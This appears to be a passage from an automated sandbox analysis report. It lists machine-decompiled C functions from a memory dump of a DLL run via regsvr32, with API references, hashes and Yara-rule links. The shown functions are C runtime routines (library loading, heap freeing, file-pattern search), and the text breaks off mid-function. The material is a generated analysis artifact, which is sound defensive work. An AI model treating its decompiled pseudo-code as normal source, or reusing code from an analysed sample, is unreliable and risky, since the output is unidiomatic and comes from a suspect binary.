                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DAB09(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E736DB595(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E736DB595(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E736DA1ED(GetLastError());
									_t17 =  *((intOrPtr*)(E736DA223(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E736DABD0(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E736DA1ED(GetLastError());
						_t17 =  *((intOrPtr*)(E736DA223(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E736DABD0(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E736DABF7(_a8);
				return 0;
			}









                                                                                                                                                                                                                                0x736dab0f
                                                                                                                                                                                                                                0x736dab14
                                                                                                                                                                                                                                0x736dab28
                                                                                                                                                                                                                                0x736dab2b
                                                                                                                                                                                                                                0x736dab5d
                                                                                                                                                                                                                                0x736dab65
                                                                                                                                                                                                                                0x736dab67
                                                                                                                                                                                                                                0x736dab80
                                                                                                                                                                                                                                0x736dab83
                                                                                                                                                                                                                                0x736dab86
                                                                                                                                                                                                                                0x736dab94
                                                                                                                                                                                                                                0x736daba3
                                                                                                                                                                                                                                0x736dabab
                                                                                                                                                                                                                                0x736dabad
                                                                                                                                                                                                                                0x736dabc6
                                                                                                                                                                                                                                0x736dabc9
                                                                                                                                                                                                                                0x736dabc9
                                                                                                                                                                                                                                0x736dabaf
                                                                                                                                                                                                                                0x736dabb6
                                                                                                                                                                                                                                0x736dabc1
                                                                                                                                                                                                                                0x736dabc1
                                                                                                                                                                                                                                0x736dabcb
                                                                                                                                                                                                                                0x736dabcc
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dabcc
                                                                                                                                                                                                                                0x736dab8b
                                                                                                                                                                                                                                0x736dab90
                                                                                                                                                                                                                                0x736dab92
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dab92
                                                                                                                                                                                                                                0x736dab70
                                                                                                                                                                                                                                0x736dab7b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dab7b
                                                                                                                                                                                                                                0x736dab2d
                                                                                                                                                                                                                                0x736dab30
                                                                                                                                                                                                                                0x736dab33
                                                                                                                                                                                                                                0x736dab46
                                                                                                                                                                                                                                0x736dab49
                                                                                                                                                                                                                                0x736dab4b
                                                                                                                                                                                                                                0x736dab4d
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dab4d
                                                                                                                                                                                                                                0x736dab39
                                                                                                                                                                                                                                0x736dab3e
                                                                                                                                                                                                                                0x736dab40
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736dab40
                                                                                                                                                                                                                                0x736dab19
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\regsvr32.exe, xrefs: 736DAB0E
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                                                                                • API String ID: 0-3922119987
                                                                                                                                                                                                                                • Opcode ID: 7e6296cbfdd2884b54e2f8e3371bfd6a8e363e8b4503814b0b81eb416b597d58
                                                                                                                                                                                                                                • Instruction ID: a2c6762b99dba583604e148ca0d4e46b457bccef109de54f29a85d27c6923ba1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e6296cbfdd2884b54e2f8e3371bfd6a8e363e8b4503814b0b81eb416b597d58
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40218E72638205AFEF119F71DD80F5A7BBFAB402A87144614E52ADB3C0EB31DD5287A1
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D8834, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736D8834(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x736ef518 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x736e1b00 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E736D9913(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}













                                                                                                                                                                                                                                0x736d883b
                                                                                                                                                                                                                                0x736d88af
                                                                                                                                                                                                                                0x736d8840
                                                                                                                                                                                                                                0x736d8842
                                                                                                                                                                                                                                0x736d8849
                                                                                                                                                                                                                                0x736d884d
                                                                                                                                                                                                                                0x736d8856
                                                                                                                                                                                                                                0x736d8865
                                                                                                                                                                                                                                0x736d886e
                                                                                                                                                                                                                                0x736d8872
                                                                                                                                                                                                                                0x736d88bb
                                                                                                                                                                                                                                0x736d88bd
                                                                                                                                                                                                                                0x736d88c1
                                                                                                                                                                                                                                0x736d88c4
                                                                                                                                                                                                                                0x736d88c4
                                                                                                                                                                                                                                0x736d88ca
                                                                                                                                                                                                                                0x736d88ca
                                                                                                                                                                                                                                0x736d88b6
                                                                                                                                                                                                                                0x736d88ba
                                                                                                                                                                                                                                0x736d88ba
                                                                                                                                                                                                                                0x736d8874
                                                                                                                                                                                                                                0x736d887d
                                                                                                                                                                                                                                0x736d88a7
                                                                                                                                                                                                                                0x736d88aa
                                                                                                                                                                                                                                0x736d88ac
                                                                                                                                                                                                                                0x736d88ac
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d88ac
                                                                                                                                                                                                                                0x736d887f
                                                                                                                                                                                                                                0x736d888a
                                                                                                                                                                                                                                0x736d888f
                                                                                                                                                                                                                                0x736d8894
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d889b
                                                                                                                                                                                                                                0x736d88a1
                                                                                                                                                                                                                                0x736d88a5
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d88a5
                                                                                                                                                                                                                                0x736d8852
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8854
                                                                                                                                                                                                                                0x736d88b4
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,736D88F5,00000000,?,00000001,00000000,?,736D896C,00000001,FlsFree,736E1BBC,FlsFree,00000000), ref: 736D88C4
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                • API String ID: 3664257935-2084034818
                                                                                                                                                                                                                                • Opcode ID: d022294aff87d64663cc2e7493d2bc4e012ee68824be173bd89d749137fc6cb1
                                                                                                                                                                                                                                • Instruction ID: 5d2e58dd57d7c3d07b60fc2566b4470bb635626ff78098474deb944e90907e93
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d022294aff87d64663cc2e7493d2bc4e012ee68824be173bd89d749137fc6cb1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A11CA72E61620EBDF139B69CD4CB4933B9AF41B71F290251E916FB1C4D770E90486D4
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D8E50, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31libraryloaderCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 25%
                                                                                                                                                                                                                                			E736D8E50(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x736e1104(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}






                                                                                                                                                                                                                                0x736d8e56
                                                                                                                                                                                                                                0x736d8e5a
                                                                                                                                                                                                                                0x736d8e65
                                                                                                                                                                                                                                0x736d8e6d
                                                                                                                                                                                                                                0x736d8e78
                                                                                                                                                                                                                                0x736d8e7e
                                                                                                                                                                                                                                0x736d8e82
                                                                                                                                                                                                                                0x736d8e89
                                                                                                                                                                                                                                0x736d8e8f
                                                                                                                                                                                                                                0x736d8e8f
                                                                                                                                                                                                                                0x736d8e91
                                                                                                                                                                                                                                0x736d8e96
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736d8e9b
                                                                                                                                                                                                                                0x736d8ea4

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,736D8E02,?,?,736D8DCA,?,00000001,?), ref: 736D8E65
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 736D8E78
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,736D8E02,?,?,736D8DCA,?,00000001,?), ref: 736D8E9B
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                • Opcode ID: 8027a243db6af2daf51c8e872d7344f2e109587b5c075c5b3e5d52ecc90fd6f8
                                                                                                                                                                                                                                • Instruction ID: 176e972b41e59aed32b431ad836198e4bbf432327f2d2d4b1fd7f101123bfb0c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8027a243db6af2daf51c8e872d7344f2e109587b5c075c5b3e5d52ecc90fd6f8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3F05E76A51218FBCF01AB52CE0DB9E7A78FB01B56F204190EC0AE6194CB744E04EA91
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DE977, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E736DE977(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x736eb6f8; // 0x736eb748
					if(_t23 != 0) {
						E736DA293(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x736eb6fc; // 0x736efb20
					if(_t24 != 0) {
						E736DA293(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x736eb700; // 0x736efb20
					if(_t25 != 0) {
						E736DA293(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x736eb728; // 0x736eb74c
					if(_t26 != 0) {
						E736DA293(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x736eb72c; // 0x736efb24
					if(_t27 != 0) {
						return E736DA293(_t6);
					}
				}
				return _t6;
			}










                                                                                                                                                                                                                                0x736de97d
                                                                                                                                                                                                                                0x736de982
                                                                                                                                                                                                                                0x736de986
                                                                                                                                                                                                                                0x736de98c
                                                                                                                                                                                                                                0x736de98f
                                                                                                                                                                                                                                0x736de994
                                                                                                                                                                                                                                0x736de998
                                                                                                                                                                                                                                0x736de99e
                                                                                                                                                                                                                                0x736de9a1
                                                                                                                                                                                                                                0x736de9a6
                                                                                                                                                                                                                                0x736de9aa
                                                                                                                                                                                                                                0x736de9b0
                                                                                                                                                                                                                                0x736de9b3
                                                                                                                                                                                                                                0x736de9b8
                                                                                                                                                                                                                                0x736de9bc
                                                                                                                                                                                                                                0x736de9c2
                                                                                                                                                                                                                                0x736de9c5
                                                                                                                                                                                                                                0x736de9ca
                                                                                                                                                                                                                                0x736de9cb
                                                                                                                                                                                                                                0x736de9ce
                                                                                                                                                                                                                                0x736de9d4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x736de9dc
                                                                                                                                                                                                                                0x736de9d4
                                                                                                                                                                                                                                0x736de9df

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DE98F
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: HeapFree.KERNEL32(00000000,00000000,?,736D94E3), ref: 736DA2A9
                                                                                                                                                                                                                                  • Part of subcall function 736DA293: GetLastError.KERNEL32(?,?,736D94E3), ref: 736DA2BB
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DE9A1
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DE9B3
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DE9C5
                                                                                                                                                                                                                                • _free.LIBCMT ref: 736DE9D7
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000002.00000002.881779075.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881755550.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881828436.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881847723.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881877209.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881905060.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000002.00000002.881930845.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                • Opcode ID: 9bad553d5c7c4955ffe25476545b5191014ef54c13574ff0bb5baf07eadcd70c
                                                                                                                                                                                                                                • Instruction ID: f29c1593be9b63d06d2dc35ea2a833e974e703468a758a93678c0f7635191466
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9bad553d5c7c4955ffe25476545b5191014ef54c13574ff0bb5baf07eadcd70c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F09C769693009BCF45DB66D689F1633E9FA007107780919F09FDB7C0C735F99086A8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736DA485, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 207COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 80%
                                                                                                                                                                                                                                			E736DA485(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E736D9191(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E736DD1A7(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E736DA176();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E736DA236(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E736DD1A7(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E736DAA77(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E736DA293(_t300);
														_t302 = _v12;
													}
													E736DA293(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E736DD1A7(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E736DA176();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x736eb004; // 0xd4a5741
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E736DD200(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E736DA466(_t244 - _t287 + 1, _t287,  &_v676, E736DA982(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E736DA397( &(_v608.cFileName),  &_v640,  &_v609, E736DA982(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E736DA293(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
